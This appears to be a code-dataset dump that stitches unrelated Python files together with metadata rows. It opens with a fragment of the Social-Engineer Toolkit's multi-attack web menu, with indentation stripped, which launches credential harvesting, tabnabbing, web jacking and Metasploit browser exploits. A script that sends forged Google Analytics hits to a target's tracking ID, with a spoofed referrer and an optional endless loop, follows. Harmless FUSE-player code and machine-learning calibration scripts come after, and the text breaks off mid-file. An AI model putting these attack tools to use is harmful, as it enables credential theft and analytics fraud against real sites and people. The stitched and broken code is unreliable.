toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# grab current path
definepath = os.getcwd()
# default flag for webdav to be off
webdav_enable = "OFF"
# see if we are running a custom cloned website
clonedurl = 0
fileopen = open(userconfigpath + "site.template", "r")
data = fileopen.read()
if "TEMPLATE=SELF" in data:
clonedurl = 1
# clean up cloner directory
if clonedurl == 0:
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants
a = 1
print ("""
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]
The multi attack vector utilizes each combination of attacks
    and allows the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
    you're finished, be sure to select the 'I'm finished' option.""")
print("""\nSelect which attacks you want to use:
""")
while a == 1:
trigger = ""
print(" 1. Java Applet Attack Method" + toggleflag_java)
print(" 2. Metasploit Browser Exploit Method" + toggleflag_meta)
print(" 3. Credential Harvester Attack Method" + toggleflag_harv)
print(" 4. Tabnabbing Attack Method" + toggleflag_tabnab)
print(" 5. Web Jacking Attack Method" + toggleflag_webjacking)
print(" 6. Use them all - A.K.A. 'Tactical Nuke'")
print(" 7. I'm finished and want to proceed with the attack")
print("\n 0. Return to Main Menu\n")
profile = input(
setprompt(["2", "16"], "Enter selections one at a time (7 to finish)"))
if profile == "":
profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will
# trigger invalid option
    try: # this will trigger an error if it isn't an integer
profile = int(profile)
# convert it back
profile = str(profile)
    # if it triggers an exception, reassign profile to option 10 (treated as invalid)
except:
profile = "10"
# if you want to return to main menu
if profile == "0":
break
# trigger invalid option
if int(profile) >= 10:
input("\nInvalid option..")
return_continue()
if profile == "6":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print(bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
(: :)
':._ _.:'
| |
(=====)
| |
| |
| |
((/ \))""") + bcolors.ENDC)
print("\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?")
print("\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n")
java_applet = "on"
meta_attack = "on"
harvester = "on"
break
if profile == "7":
break
# java applet on/off
if profile == "1":
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet = "on"
trigger = 1
# toggle_flags here
toggleflag_java = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet = "off"
# toggle flags here
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack == "off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack = "on"
trigger = 1
# toggle flags here
toggleflag_meta = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if meta_attack == "on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack = "off"
# toggle flags here
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester = "on"
trigger = 1
# toggle flags here
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester = "off"
# toggle flags here
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing = "on"
trigger = 1
harvester = "on"
# toggle flags here
toggleflag_tabnab = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
print(webjacking)
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
flag_off("Tabnabbing")
return_menu()
tabnabbing = "off"
harvester = "off"
# toggle flags here
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# turn webjacking on
if profile == "5":
if webjacking == "off":
flag_on("Web Jacking")
webjacking = "on"
return_menu()
trigger = 1
if tabnabbing == "on" or mlitm == "on":
print("[*] You cannot use MLITM and Tabnabbing in the same attack!")
print("[*] Disabling MLITM and/or Tabnabbing")
mlitm = "off"
tabnabbing = "off"
harvester = "on"
# toggle flags here
toggleflag_mlitm = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if harvester == "off":
harvester = "on"
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking = "off"
# toggle flags here
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# next series of flags needed
payloadgen = 0
# write handler files for detection
if java_applet == "on":
write_file("multi_java", "multiattack=java_on")
if meta_attack == "on":
write_file("multi_meta", "multiattack=meta_on")
if tabnabbing == "on":
write_file("multi_tabnabbing", "multiattack=tabnabbing_on")
if harvester == "on":
write_file("multi_harvester", "multiattack=harvester_on")
if mlitm == "on":
write_file("multi_mlitm", "multiattack=mlitm_on")
if webjacking == "on":
write_file("multi_webjacking", "multiattack=webjacking_on")
# hit cloner flag
# if any of the flags are turned on, then trigger to see if ARP Cache
# needs to be enabled
if java_applet == "on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me, "importing 'src.webattack.web_clone.cloner'", 1)
try:
module_reload(cloner)
except:
import cloner
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me, "importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# start the stuff for java applet
if java_applet == "on":
sys.path.append("src/core/payloadgen/")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(create_payloads)
except:
import create_payloads
payloadgen = 1
applet_choice()
# start the stuff for metasploit client side
if meta_attack == "on":
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
# this checks to see if the MSF payload uses webdav, if so we have to
# force port 80
if os.path.isfile(userconfigpath + "webdav_enabled"):
webdav_enabled = "on"
# set this in case msf attack, java applet, and harvester are needed
pexpect_flag = "off"
# start the stuff for harvester
if harvester == "on" or tabnabbing == "on" or webjacking == "on":
if tabnabbing == "on" or webjacking == "on":
        # if tabnabbing is on, set the tabnabbing flag to on
sys.path.append("src/webattack/tabnabbing")
debug_msg(me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(tabnabbing)
except:
import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag = "on"
a = subprocess.Popen(
"python3 src/webattack/harvester/harvester.py", shell=True)
# start stuff for mlitm
if mlitm == "on":
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a = subprocess.Popen("python3 src/mlitm/mlitm.py")
else:
debug_msg(me, "importing 'src.mlitm.mlitm'", 1)
try:
module_reload(mlitm)
except:
import mlitm
# start the web server
if java_applet == "on" or meta_attack == "on":
sys.path.append("src/html/")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
module_reload(spawn)
except:
import spawn
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
os.chdir(definepath)
sys.path.append("%s/src/webattack/harvester/" % (definepath))
import report_generator
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill(a.pid, signal.SIGTERM)
print_status("\nReport exported.")
return_continue()
| 13,603 | Python | .tac | 349 | 30.30659 | 115 | 0.569458 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,865 | google_analytics_attack.py | CHEGEBB_africana-framework/externals/set/modules/google_analytics_attack.py | #!/usr/bin/env python3
from __future__ import print_function
print("Loading module. Please wait...")
import src.core.setcore
import sys
import requests
import re
import time
import random
try:
input = raw_input
except NameError:
pass
MAIN="Google Analytics Attack by @ZonkSec"
AUTHOR="Tyler Rosonke (@ZonkSec)"
### MAIN ###
def main():
print_title()
    # determines if auto or manual, then calls functions
mode_choice = input("[*] Choose mode (automatic/manual): ")
if mode_choice in ("automatic","auto"):
print("\n[*] Entering automatic mode.\n")
url = input("[*] Target website (E.g. 'http://xyz.com/'): ")
params = auto_params(url)
elif mode_choice in ("manual","man"):
print("\n[*] Entering manual mode.")
params = manual_params()
else:
print("\n[-] Invalid mode.\n")
sys.exit()
# params have been collected, prompts for print
print("\n[+] Payload ready.")
printchoice = input("\n[*] Print payload?(y/n): ")
if printchoice == "y":
print_params(params)
#sends request
input("\nPress <enter> to send payload.")
send_spoof(params)
#prompts for loop, calls function if need be
loopchoice = input("\n[*] Send payload on loop?(y/n) ")
if loopchoice == "y":
looper(params)
input("\n\nThis module has finished completing. Press <enter> to continue")
### print_params - loops through params and prints
def print_params(params):
print()
for entry in params:
print(entry + " = " + params[entry])
### looper - prompts for seconds to sleep, starts loop
def looper(params):
secs = input("[*] Seconds between payload sends: ")
input("\nSending request every "+secs+" seconds. Use CTRL+C to terminate. Press <enter> to begin loop.")
while True:
send_spoof(params)
time.sleep(int(secs))
### send_spoof - randomizes client id, then sends request to google service
def send_spoof(params):
params['cid'] = random.randint(100,999)
r = requests.get('https://www.google-analytics.com/collect', params=params)
print("\n[+] Payload sent.")
print(r.url)
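# For reference, the call above issues a GET against the Measurement Protocol
# collect endpoint with the assembled params; with placeholder values it looks
# roughly like (parameter order may differ):
#   https://www.google-analytics.com/collect?v=1&tid=UA-XXXXX-Y&cid=742&t=pageview&dh=http%3A%2F%2Fxyz.com%2F&dp=%2Faboutme&dt=About%20Me&dr=http%3A%2F%2Freferrer.example%2F&aip=1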
### auto_params - makes request to target site, regexes for params
def auto_params(url):
try: #parses URL for host and page
        m = re.search(r'(https?:\/\/(.*?))\/(.*)', url)
host = str(m.group(1))
page = "/" + str(m.group(3))
except:
print("\n[-] Unable to parse URL for host/page. Did you forget an ending '/'?\n")
sys.exit()
try: #makes request to target page
r = requests.get(url)
except:
print("\n[-] Unable to reach target website for parsing.\n")
sys.exit()
try: #parses target webpage for title
        m = re.search(r'<title>(.*)<\/title>', r.text)
page_title = str(m.group(1))
except:
print("\n[-] Unable to parse target page for title.\n")
sys.exit()
try: #parses target webpage for tracking id
m = re.search("'(UA-(.*))',", r.text)
tid = str(m.group(1))
except:
print("\n[-] Unable to find TrackingID (UA-XXXXX). Website may not be running Google Anayltics.\n")
sys.exit()
#builds params dict
params = {}
params['v'] = "1"
params['tid'] = tid
params['cid'] = "555"
params['t'] = "pageview"
params['dh'] = host
params['dp'] = page
params['dt'] = page_title
params['aip'] = "1"
params['dr'] = input("\n[*] Enter referral URL to spoof (E.g. 'http://xyz.com/'): ")
return params
### manual_params - prompts for all params
def manual_params():
params = {}
params['v'] = "1"
params['tid'] = input("\n[*] Enter TrackingID (tid)(UA-XXXXX): ")
params['cid'] = "555"
params['t'] = "pageview"
params['aip'] = "1"
params['dh'] = input("[*] Enter target host (dh)(E.g. 'http://xyz.xyz)': ")
params['dp'] = input("[*] Enter target page (dp)(E.g. '/aboutme'): ")
params['dt'] = input("[*] Enter target page title (dt)(E.g. 'About Me'): ")
params['dr'] = input("[*] Enter referal page to spoof (dr): ")
return params
### print_title - prints title and references
def print_title():
print("\n----------------------------------")
print(" Google Analytics Attack ")
print(" By Tyler Rosonke (@ZonkSec) ")
print("----------------------------------\n")
print("User-Guide: http://www.zonksec.com/blog/social-engineering-google-analytics/\n")
print("References:")
print("-https://developers.google.com/analytics/devguides/collection/protocol/v1/reference")
print("-https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters\n\n")
| 4,675 | Python | .tac | 122 | 33.196721 | 108 | 0.612726 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,866 | play.py | buckley310_bad-apple-fs/play.py | import sys
import time
import json
import zlib
from fuse import FUSE, Operations
class Play(Operations):
def __init__(self):
self.fps = 29.97
with open("frames.dat", "rb") as f:
self.frames = json.loads(zlib.decompress(f.read()))
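    # readdir("/") yields one entry per frame whose name starts with the wall-clock
    # time (in ms) at which the frame is due, followed by the frame index and a
    # progress bar; listing a frame's directory then sleeps until that timestamp
    # before yielding the braille rows, which is what paces playback at ~29.97 fps.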
def readdir(self, path, _):
yield "."
yield ".."
if path == "/":
start = time.time()
flen = len(self.frames)
wid = len(self.frames[0][0])
for i in range(flen):
yield " ".join(
[
str(int((i / self.fps + start) * 1000)),
str(i).rjust(4, "0"),
" " * 8,
f"[{('='*int(wid*(i+1)/flen)).ljust(wid)}]",
]
)
else:
target = int(path.split("/")[1].split(" ")[0]) / 1000
delay = target - time.time()
if delay > 0:
time.sleep(delay)
fnum = int(path.split("/")[1].split(" ")[1])
for i in range(len(self.frames[fnum])):
yield str(i).rjust(2, "0") + " \u2502" + self.frames[fnum][i] + "\u2502"
def getattr(self, path, _=None):
m = time.timezone
try:
m += int(path.split("/")[1].split(" ")[1]) / self.fps
except IndexError:
pass
return {
"st_atime": 0,
"st_ctime": 0,
"st_gid": 0,
"st_mode": 0x8000 if path.count("/") > 1 else 0x4000,
"st_mtime": m,
"st_nlink": 1,
"st_size": 0,
"st_uid": 0,
}
FUSE(Play(), sys.argv[1])
| 1,681 | Python | .py | 51 | 21.215686 | 88 | 0.424168 | buckley310/bad-apple-fs | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,867 | gen.py | buckley310_bad-apple-fs/gen.py | import cv2
import json
import zlib
def read_video():
i = 1
v = cv2.VideoCapture("video.webm")
while (frame := v.read())[0]:
print("processing frame:", i, "/", v.get(cv2.CAP_PROP_FRAME_COUNT))
yield frame[1]
i += 1
def main():
scale = 8
subpixels = (
(1 * scale, 3 * scale),
(0 * scale, 3 * scale),
(1 * scale, 2 * scale),
(1 * scale, 1 * scale),
(1 * scale, 0 * scale),
(0 * scale, 2 * scale),
(0 * scale, 1 * scale),
(0 * scale, 0 * scale),
)
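    # (x, y) offsets of the 8 dots in a 2x4 braille cell, ordered so the MSB-first
    # shift loop below lands each sample on the right bit of the U+2800 block:
    # bit 7 = dot 8, bit 6 = dot 7, bits 5-3 = dots 6-4, bits 2-0 = dots 3-1.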
frames = []
for img in read_video():
frame = []
for y in range(len(img) // (4 * scale)):
ln = ""
for x in range(len(img[0]) // (2 * scale)):
outi = 0
for xa, ya in subpixels:
outi <<= 1
outi += img[y * 4 * scale + ya][x * 2 * scale + xa][0] > 127
ln += chr(0x2800 + outi)
frame.append(ln)
frames.append(frame)
print("\n".join(frame))
with open("frames.dat", "wb") as f:
f.write(zlib.compress(json.dumps(frames).encode("ascii")))
main()
| 1,177 | Python | .py | 39 | 21.564103 | 80 | 0.464128 | buckley310/bad-apple-fs | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,868 | setup.py | cvlab-yonsei_RankMixup/setup.py | from setuptools import setup, find_packages
setup(
name="calibrate",
version="0.1",
packages=find_packages(),
    python_requires=">=3.8",
install_requires=[
"torch==1.8.1",
"torchvision>=0.8.2",
"ipdb==0.13.9",
"albumentations==1.1.0",
"opencv-python==4.5.1.48",
"hydra-core==1.1.2",
"flake8==4.0.1",
"wandb==0.12.14",
"terminaltables==3.1.10",
"matplotlib==3.5.1",
"plotly==5.7.0",
"pandas==1.4.2"
],
)
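# Typical developer install from the repository root: pip install -e .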
| 522 | Python | .py | 21 | 18.095238 | 43 | 0.518 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,869 | test_net.py | cvlab-yonsei_RankMixup/tools/test_net.py | import os
import sys
import logging
import hydra
from omegaconf import DictConfig, OmegaConf
from omegaconf.omegaconf import open_dict
from calibrate.engine import Tester, OODTester
from calibrate.utils import set_random_seed
logger = logging.getLogger(__name__)
TESTER = {
"cv": Tester,
"ood": OODTester,
}
@hydra.main(config_path="../configs", config_name="defaults")
def main(cfg: DictConfig):
logger.info("Launch command : ")
logger.info(" ".join(sys.argv))
with open_dict(cfg):
cfg.work_dir = os.getcwd()
logger.info("\n" + OmegaConf.to_yaml(cfg))
set_random_seed(
cfg.seed if cfg.seed is not None else None,
deterministic=True if cfg.seed is not None else False
)
tester = TESTER[cfg.task](cfg)
tester.run()
logger.info("Job complete !\n")
if __name__ == "__main__":
main()
| 862 | Python | .py | 29 | 25.896552 | 61 | 0.693803 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,870 | train_net.py | cvlab-yonsei_RankMixup/tools/train_net.py | import os
import sys
import logging
import hydra
from omegaconf import DictConfig, OmegaConf
from omegaconf.omegaconf import open_dict
from calibrate.engine import Trainer, SegmentTrainer, NLPTrainer
from calibrate.utils import set_random_seed
logger = logging.getLogger(__name__)
TRAINERS = {
"cv": Trainer,
"segment": SegmentTrainer,
"nlp": NLPTrainer,
}
@hydra.main(config_path="../configs", config_name="defaults")
def main(cfg: DictConfig):
logger.info("Launch command : ")
logger.info(" ".join(sys.argv))
with open_dict(cfg):
cfg.work_dir = os.getcwd()
logger.info("\n" + OmegaConf.to_yaml(cfg))
set_random_seed(
cfg.seed if cfg.seed is not None else None,
deterministic=True if cfg.seed is not None else False
)
trainer = TRAINERS[cfg.task](cfg)
trainer.run()
logger.info("Job complete !\n")
if __name__ == "__main__":
main()
| 919 | Python | .py | 30 | 26.766667 | 64 | 0.700796 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,871 | newsgroup.py | cvlab-yonsei_RankMixup/calibrate/data/newsgroup.py | import os
import os.path as osp
import sys
import numpy as np
import torch
import logging
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
logger = logging.getLogger(__name__)
def ng_loader(
data_dir: str,
max_sequence_length: int = 1000,
max_num_words: int = 2000,
embedding_dim: int = 100,
test_split: float = 0.2,
shuffle=True,
random_seed=1,
):
# BASE_DIR = 'NewsGroup'
# GLOVE_DIR = os.path.join(BASE_DIR, 'glove.6B')
# TEXT_DATA_DIR = os.path.join(BASE_DIR, '20_newsgroup')
# MAX_SEQUENCE_LENGTH = 1000
# MAX_NUM_WORDS = 20000
# EMBEDDING_DIM = 100
# VALIDATION_SPLIT = 0.2
logger.info("Start process 20 newsgroups text data ...")
glove_dir = osp.join(data_dir, "glove.6B")
text_data_dir = osp.join(data_dir, "20_newsgroups")
logger.debug('Indexing word vectors.')
embeddings_index = {}
with open(
osp.join(glove_dir, "glove.6B.{}d.txt".format(embedding_dim))
) as f:
for line in f:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
logger.debug('Found {} word vectors.'.format(len(embeddings_index)))
# second, prepare text samples and their labels
logger.debug('Processing text dataset')
texts = [] # list of text samples
labels_index = {} # dictionary mapping label name to numeric id
labels = [] # list of label ids
for name in sorted(os.listdir(text_data_dir)):
path = osp.join(text_data_dir, name)
if osp.isdir(path):
label_id = len(labels_index)
labels_index[name] = label_id
for fname in sorted(os.listdir(path)):
if fname.isdigit():
fpath = osp.join(path, fname)
if sys.version_info < (3,):
f = open(fpath)
else:
f = open(fpath, encoding='latin-1')
t = f.read()
i = t.find('\n\n') # skip header
if 0 < i:
t = t[i:]
texts.append(t)
f.close()
labels.append(label_id)
logger.debug('Found {} texts.'.format(len(texts)))
# finally, vectorize the text samples into a 2D integer tensor
tokenizer = Tokenizer(num_words=max_num_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
logger.debug('Found {} unique tokens.'.format(len(word_index)))
data = pad_sequences(sequences, maxlen=max_sequence_length)
labels = to_categorical(np.asarray(labels))
logger.info('Shape of data tensor: {}'.format(data.shape))
logger.info('Shape of label tensor: {}'.format(labels.shape))
# split the data into a training set and a validation set
indices = np.arange(data.shape[0])
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
num_test_samples = int(test_split * data.shape[0])
x_train = data[:-(num_test_samples + 900)] # Train set
y_train = labels[:-(num_test_samples + 900)]
x_val = data[
(data.shape[0] - num_test_samples - 900):(data.shape[0] - num_test_samples)
] # Validation set
y_val = labels[
data.shape[0]-(num_test_samples+900):(data.shape[0]-num_test_samples)
]
x_test = data[-num_test_samples:] # Test set
y_test = labels[-num_test_samples:]
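    # Split layout after shuffling: the last `test_split` fraction is the test set,
    # the 900 samples right before it form the validation set, and everything
    # earlier is used for training.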
logger.info(data.shape[0] - num_test_samples)
# logger.info('VAL: ', x_val.shape, data.shape)
# logger.info('Preparing embedding matrix.', x_train.shape)
# prepare embedding matrix
num_words = min(max_num_words, len(word_index))
embedding_matrix = torch.zeros(num_words, embedding_dim)
for word, i in word_index.items():
if i >= max_num_words:
continue
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
# words not found in embedding index will be all-zeros.
embedding_matrix[i] = torch.from_numpy(embedding_vector)
logger.info("Done with text processing")
return embedding_matrix, x_train, y_train, x_val, y_val, x_test, y_test, num_words, embedding_dim
| 4,485 | Python | .py | 108 | 33.62037 | 101 | 0.621355 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,872 | cifar10_LT.py | cvlab-yonsei_RankMixup/calibrate/data/cifar10_LT.py | import numpy as np
from .sampler import ClassAwareSampler
import torch
import torchvision
from torchvision import transforms
import torchvision.datasets
class IMBALANCECIFAR10(torchvision.datasets.CIFAR10):
cls_num = 10
def __init__(self, root, imb_type='exp', imb_factor=0.01, rand_number=0, train=True,
transform=None, target_transform=None,
download=False):
super(IMBALANCECIFAR10, self).__init__(root, train, transform, target_transform, download)
np.random.seed(rand_number)
img_num_list = self.get_img_num_per_cls(self.cls_num, imb_type, imb_factor)
self.gen_imbalanced_data(img_num_list)
def get_img_num_per_cls(self, cls_num, imb_type, imb_factor):
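        # 'exp': class c keeps img_max * imb_factor**(c / (cls_num - 1)) samples, so
        # class 0 stays full-size and the last class keeps img_max * imb_factor;
        # 'step': the first half of the classes stay full-size, the rest are scaled
        # down by imb_factor; any other value keeps every class at img_max.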
img_max = len(self.data) / cls_num
img_num_per_cls = []
if imb_type == 'exp':
for cls_idx in range(cls_num):
num = img_max * (imb_factor**(cls_idx / (cls_num - 1.0)))
img_num_per_cls.append(int(num))
elif imb_type == 'step':
for cls_idx in range(cls_num // 2):
img_num_per_cls.append(int(img_max))
for cls_idx in range(cls_num // 2):
img_num_per_cls.append(int(img_max * imb_factor))
else:
img_num_per_cls.extend([int(img_max)] * cls_num)
return img_num_per_cls
def gen_imbalanced_data(self, img_num_per_cls):
new_data = []
new_targets = []
targets_np = np.array(self.targets, dtype=np.int64)
classes = np.unique(targets_np)
# np.random.shuffle(classes)
self.num_per_cls_dict = dict()
for the_class, the_img_num in zip(classes, img_num_per_cls):
self.num_per_cls_dict[the_class] = the_img_num
idx = np.where(targets_np == the_class)[0]
np.random.shuffle(idx)
selec_idx = idx[:the_img_num]
new_data.append(self.data[selec_idx, ...])
new_targets.extend([the_class, ] * the_img_num)
new_data = np.vstack(new_data)
self.data = new_data
self.targets = new_targets
def get_cls_num_list(self):
cls_num_list = []
for i in range(self.cls_num):
cls_num_list.append(self.num_per_cls_dict[i])
return cls_num_list
class CIFAR10_LT(object):
def __init__(self, distributed, root='./data/cifar10', imb_type='exp',
imb_factor=0.01, batch_size=128, num_works=40):
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
eval_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
train_dataset = IMBALANCECIFAR10(root=root, imb_type=imb_type, imb_factor=imb_factor, rand_number=0, train=True, download=True, transform=train_transform)
eval_dataset = torchvision.datasets.CIFAR10(root=root, train=False, download=False, transform=eval_transform)
self.cls_num_list = train_dataset.get_cls_num_list()
self.dist_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if distributed else None
self.train_instance = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size, shuffle=True,
num_workers=num_works, pin_memory=True, sampler=self.dist_sampler)
balance_sampler = ClassAwareSampler(train_dataset)
self.train_balance = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True, sampler=balance_sampler)
self.eval = torch.utils.data.DataLoader(
eval_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True)
class CIFAR10_LT_test(object):
def __init__(self, distributed, root='./data/cifar10', imb_type='exp',
imb_factor=0.01, batch_size=128, num_works=40):
eval_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
eval_dataset = torchvision.datasets.CIFAR10(root=root, train=False, download=False, transform=eval_transform)
self.eval = torch.utils.data.DataLoader(
eval_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True)
def get_train_valid_loader(distributed=False, root='/dataset/cifar10', imb_factor=0.01, batch_size=128, num_works=40):
dataset = CIFAR10_LT(distributed, root=root, imb_factor=imb_factor,
batch_size=batch_size, num_works=num_works)
train_loader = dataset.train_balance
val_loader = dataset.eval
return (train_loader, val_loader)
def get_test_loader(distributed=False, root='/dataset/cifar10', imb_factor=0.01, batch_size=128, num_works=40):
dataset = CIFAR10_LT_test(distributed, root=root, imb_factor=imb_factor,
batch_size=batch_size, num_works=num_works)
test_loader = dataset.eval
return test_loader | 5,525 | Python | .py | 105 | 41.238095 | 162 | 0.631619 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,873 | cifar100_LT.py | cvlab-yonsei_RankMixup/calibrate/data/cifar100_LT.py | import numpy as np
from .sampler import ClassAwareSampler
import torch
import torchvision
from torchvision import transforms
import torchvision.datasets
class IMBALANCECIFAR100(torchvision.datasets.CIFAR100):
cls_num = 100
def __init__(self, root, imb_type='exp', imb_factor=0.01, rand_number=0, train=True,
transform=None, target_transform=None,
download=False):
super(IMBALANCECIFAR100, self).__init__(root, train, transform, target_transform, download)
np.random.seed(rand_number)
img_num_list = self.get_img_num_per_cls(self.cls_num, imb_type, imb_factor)
self.gen_imbalanced_data(img_num_list)
def get_img_num_per_cls(self, cls_num, imb_type, imb_factor):
img_max = len(self.data) / cls_num
img_num_per_cls = []
if imb_type == 'exp':
for cls_idx in range(cls_num):
num = img_max * (imb_factor**(cls_idx / (cls_num - 1.0)))
img_num_per_cls.append(int(num))
elif imb_type == 'step':
for cls_idx in range(cls_num // 2):
img_num_per_cls.append(int(img_max))
for cls_idx in range(cls_num // 2):
img_num_per_cls.append(int(img_max * imb_factor))
else:
img_num_per_cls.extend([int(img_max)] * cls_num)
return img_num_per_cls
def gen_imbalanced_data(self, img_num_per_cls):
new_data = []
new_targets = []
targets_np = np.array(self.targets, dtype=np.int64)
classes = np.unique(targets_np)
# np.random.shuffle(classes)
self.num_per_cls_dict = dict()
for the_class, the_img_num in zip(classes, img_num_per_cls):
self.num_per_cls_dict[the_class] = the_img_num
idx = np.where(targets_np == the_class)[0]
np.random.shuffle(idx)
selec_idx = idx[:the_img_num]
new_data.append(self.data[selec_idx, ...])
new_targets.extend([the_class, ] * the_img_num)
new_data = np.vstack(new_data)
self.data = new_data
self.targets = new_targets
def get_cls_num_list(self):
cls_num_list = []
for i in range(self.cls_num):
cls_num_list.append(self.num_per_cls_dict[i])
return cls_num_list
class CIFAR100_LT(object):
def __init__(self, distributed, root='./data/cifar100', imb_type='exp',
imb_factor=0.01, batch_size=128, num_works=40):
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
eval_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
